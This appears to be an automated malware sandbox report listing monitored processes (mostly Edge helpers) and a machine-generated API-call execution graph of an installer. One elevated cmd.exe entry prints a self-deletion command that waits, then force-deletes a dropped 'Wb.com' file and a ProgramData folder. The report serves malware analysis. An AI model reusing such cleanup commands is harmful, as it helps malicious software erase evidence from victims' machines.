Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6584 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
Imagebase:0x7ff715da0000
File size:4'210'216 bytes
MD5 hash:BF154738460E4AB1D388970E1AB13FAB
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:29
Start time:11:15:02
Start date:23/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
Imagebase:0x7ff6f2da0000
File size:1'255'976 bytes
MD5 hash:F8CEC3E43A6305AC9BA3700131594306
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                                      Start time:11:15:02
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7312 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff6f2da0000
                                                                                                                                                                                                                                                                                                      File size:1'255'976 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:F8CEC3E43A6305AC9BA3700131594306
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                                                                                      Start time:11:15:29
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\623615\Wb.com" & rd /s /q "C:\ProgramData\MO8GVA1VKF37" & exit
                                                                                                                                                                                                                                                                                                      Imagebase:0x1c0000
                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                                                                                      Start time:11:15:29
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff66e660000
                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                                      Start time:11:15:29
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                      Commandline:timeout /t 10
                                                                                                                                                                                                                                                                                                      Imagebase:0xe80000
                                                                                                                                                                                                                                                                                                      File size:25'088 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                      Target ID:35
                                                                                                                                                                                                                                                                                                      Start time:11:15:56
                                                                                                                                                                                                                                                                                                      Start date:23/12/2024
                                                                                                                                                                                                                                                                                                      Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                      Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6896 --field-trial-handle=2176,i,11531749315992843651,7535443052316790149,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff715da0000
                                                                                                                                                                                                                                                                                                      File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                      MD5 hash:BF154738460E4AB1D388970E1AB13FAB
                                                                                                                                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                      Has exited:false


                                                                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                                                                        Execution Coverage:17.7%
                                                                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                        Signature Coverage:21%
                                                                                                                                                                                                                                                                                                        Total number of Nodes:1482
                                                                                                                                                                                                                                                                                                        Total number of Limit Nodes:28
CheckDlgButton 4515->4518 4516->4510 4517->4496 4528 403db1 KiUserCallbackDispatcher 4518->4528 4520 4041a5 GetDlgItem 4529 403dc4 SendMessageW 4520->4529 4522 4041bb SendMessageW 4523 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4522->4523 4524 4041d8 GetSysColor 4522->4524 4523->4510 4524->4523 4526 404033 4525->4526 4527 404015 GlobalAlloc WideCharToMultiByte 4525->4527 4526->4497 4527->4526 4528->4520 4529->4522 4530->4514 4531 402ae4 4532 402aeb 4531->4532 4533 4030e3 4531->4533 4534 402af2 CloseHandle 4532->4534 4534->4533 4535 402065 4536 401446 18 API calls 4535->4536 4537 40206d 4536->4537 4538 401446 18 API calls 4537->4538 4539 402076 GetDlgItem 4538->4539 4540 4030dc 4539->4540 4541 4030e3 4540->4541 4543 405f7d wsprintfW 4540->4543 4543->4541 4544 402665 4545 40145c 18 API calls 4544->4545 4546 40266b 4545->4546 4547 40145c 18 API calls 4546->4547 4548 402674 4547->4548 4549 40145c 18 API calls 4548->4549 4550 40267d 4549->4550 4551 4062cf 11 API calls 4550->4551 4552 40268c 4551->4552 4553 406301 2 API calls 4552->4553 4554 402695 4553->4554 4555 4026a6 lstrlenW lstrlenW 4554->4555 4557 404f9e 25 API calls 4554->4557 4559 4030e3 4554->4559 4556 404f9e 25 API calls 4555->4556 4558 4026e8 SHFileOperationW 4556->4558 4557->4554 4558->4554 4558->4559 4560 401c69 4561 40145c 18 API calls 4560->4561 4562 401c70 4561->4562 4563 4062cf 11 API calls 4562->4563 4564 401c80 4563->4564 4565 405ccc MessageBoxIndirectW 4564->4565 4566 401a13 4565->4566 4567 402f6e 4568 402f72 4567->4568 4569 402fae 4567->4569 4571 4062cf 11 API calls 4568->4571 4570 40145c 18 API calls 4569->4570 4577 402f9d 4570->4577 4572 402f7d 4571->4572 4573 4062cf 11 API calls 4572->4573 4574 402f90 4573->4574 4575 402fa2 4574->4575 4576 402f98 4574->4576 4579 406113 9 API calls 4575->4579 4578 403ea0 5 API calls 4576->4578 4578->4577 4579->4577 4580 4023f0 4581 402403 4580->4581 4582 4024da 4580->4582 4583 40145c 18 API calls 4581->4583 4584 404f9e 25 API calls 
4582->4584 4585 40240a 4583->4585 4588 4024f1 4584->4588 4586 40145c 18 API calls 4585->4586 4587 402413 4586->4587 4589 402429 LoadLibraryExW 4587->4589 4590 40241b GetModuleHandleW 4587->4590 4591 4024ce 4589->4591 4592 40243e 4589->4592 4590->4589 4590->4592 4594 404f9e 25 API calls 4591->4594 4604 406391 GlobalAlloc WideCharToMultiByte 4592->4604 4594->4582 4595 402449 4596 40248c 4595->4596 4597 40244f 4595->4597 4598 404f9e 25 API calls 4596->4598 4599 401435 25 API calls 4597->4599 4602 40245f 4597->4602 4600 402496 4598->4600 4599->4602 4601 4062cf 11 API calls 4600->4601 4601->4602 4602->4588 4603 4024c0 FreeLibrary 4602->4603 4603->4588 4605 4063c9 GlobalFree 4604->4605 4606 4063bc GetProcAddress 4604->4606 4605->4595 4606->4605 3417 402175 3427 401446 3417->3427 3419 40217c 3420 401446 18 API calls 3419->3420 3421 402186 3420->3421 3422 402197 3421->3422 3425 4062cf 11 API calls 3421->3425 3423 4021aa EnableWindow 3422->3423 3424 40219f ShowWindow 3422->3424 3426 4030e3 3423->3426 3424->3426 3425->3422 3428 406831 18 API calls 3427->3428 3429 401455 3428->3429 3429->3419 4607 4048f8 4608 404906 4607->4608 4609 40491d 4607->4609 4610 40490c 4608->4610 4625 404986 4608->4625 4611 40492b IsWindowVisible 4609->4611 4617 404942 4609->4617 4612 403ddb SendMessageW 4610->4612 4614 404938 4611->4614 4611->4625 4615 404916 4612->4615 4613 40498c CallWindowProcW 4613->4615 4626 40487a SendMessageW 4614->4626 4617->4613 4631 406035 lstrcpynW 4617->4631 4619 404971 4632 405f7d wsprintfW 4619->4632 4621 404978 4622 40141d 80 API calls 4621->4622 4623 40497f 4622->4623 4633 406035 lstrcpynW 4623->4633 4625->4613 4627 4048d7 SendMessageW 4626->4627 4628 40489d GetMessagePos ScreenToClient SendMessageW 4626->4628 4630 4048cf 4627->4630 4629 4048d4 4628->4629 4628->4630 4629->4627 4630->4617 4631->4619 4632->4621 4633->4625 3722 4050f9 3723 4052c1 3722->3723 3724 40511a GetDlgItem GetDlgItem GetDlgItem 3722->3724 3725 4052f2 3723->3725 3726 4052ca GetDlgItem CreateThread 
CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API 
calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 
4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 
API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 
403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 
405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 
3853 401c0e 3851->3853 3854 406831 18 API calls 3852->3854 3855 406831 18 API calls 3853->3855 3856 401c29 3854->3856 3858 401c16 lstrcatW 3855->3858 3859 4062cf 11 API calls 3856->3859 3858->3856 3862 401c34 3859->3862 3860 401b50 3864 401b93 3860->3864 3865 401b53 3860->3865 3861->3831 3861->3834 3861->3835 3861->3837 3861->3843 3861->3849 3861->3860 3863 4062cf 11 API calls 3861->3863 3869 405e7c GetFileAttributesW CreateFileW 3861->3869 3896 405e5c GetFileAttributesW 3861->3896 3899 405ccc 3861->3899 3866 405ccc MessageBoxIndirectW 3862->3866 3863->3861 3867 4062cf 11 API calls 3864->3867 3868 4062cf 11 API calls 3865->3868 3866->3850 3867->3850 3868->3837 3869->3861 3871 40339a 3870->3871 3872 4033c7 3871->3872 3905 403368 SetFilePointer 3871->3905 3903 403336 ReadFile 3872->3903 3876 401bc6 3876->3844 3877 403546 3879 40354a 3877->3879 3880 40356e 3877->3880 3878 4033eb GetTickCount 3878->3876 3883 403438 3878->3883 3881 403336 ReadFile 3879->3881 3880->3876 3884 403336 ReadFile 3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 
4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 
